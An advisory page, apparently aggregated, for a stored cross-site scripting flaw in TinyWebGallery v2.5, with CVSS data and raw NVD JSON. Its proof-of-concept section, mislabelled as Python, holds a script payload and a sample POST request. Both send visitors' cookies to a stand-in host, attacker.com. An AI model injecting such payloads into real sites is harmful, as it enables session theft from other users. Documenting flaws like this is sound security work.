CVE-2023-53939

Description

TinyWebGallery v2.5 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the folder name parameter. Attackers can edit album folder names with script tags to execute arbitrary JavaScript when other users view the affected gallery pages.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:tinywebgallery:tinywebgallery:2.5:*:*:*:*:*:*:* - VULNERABLE

TinyWebGallery v2.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2023-53939 Stored XSS PoC
// Target: TinyWebGallery v2.5
// Attack Vector: Album folder name parameter

// Step 1: Authenticate with low-privilege account
const loginUrl = 'http://target.com/tinywebgallery/login.php';
const credentials = {
    username: 'attacker',
    password: 'password123'
};

// Step 2: Navigate to folder management
const folderEditUrl = 'http://target.com/tinywebgallery/admin.php?action=editFolder&id=1';

// Step 3: Inject malicious XSS payload via folder name parameter
const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';
const maliciousFolderName = xssPayload;

// The malicious script will be stored and executed when other users view the gallery page
//受害者访问画廊页面时自动执行恶意脚本

// Example HTTP request to inject XSS:
/*
POST /tinywebgallery/admin.php?action=saveFolder HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

folder_name=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>&folder_id=1
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53939
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53939
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53939/
[4] VulDB https://vuldb.com/cve/CVE-2023-53939
[5] http://www.tinywebgallery.com/
[6] https://www.exploit-db.com/exploits/51442
[7] https://www.vulncheck.com/advisories/tinywebgallery-stored-cross-site-scripting-via-folder-name-parameter
[8] https://www.exploit-db.com/exploits/51442

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53939", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:52.323", "lastModified": "2025-12-24T16:46:55.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TinyWebGallery v2.5 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the folder name parameter. Attackers can edit album folder names with script tags to execute arbitrary JavaScript when other users view the affected gallery pages."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tinywebgallery:tinywebgallery:2.5:*:*:*:*:*:*:*", "matchCriteriaId": "B3FAA560-76CA-4FEB-A469-5D9FBC5A82F4"}]}]}], "references": [{"url": "http://www.tinywebgallery.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51442", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/tinywebgallery-stored-cross-site-scripting-via-folder-name-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51442", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}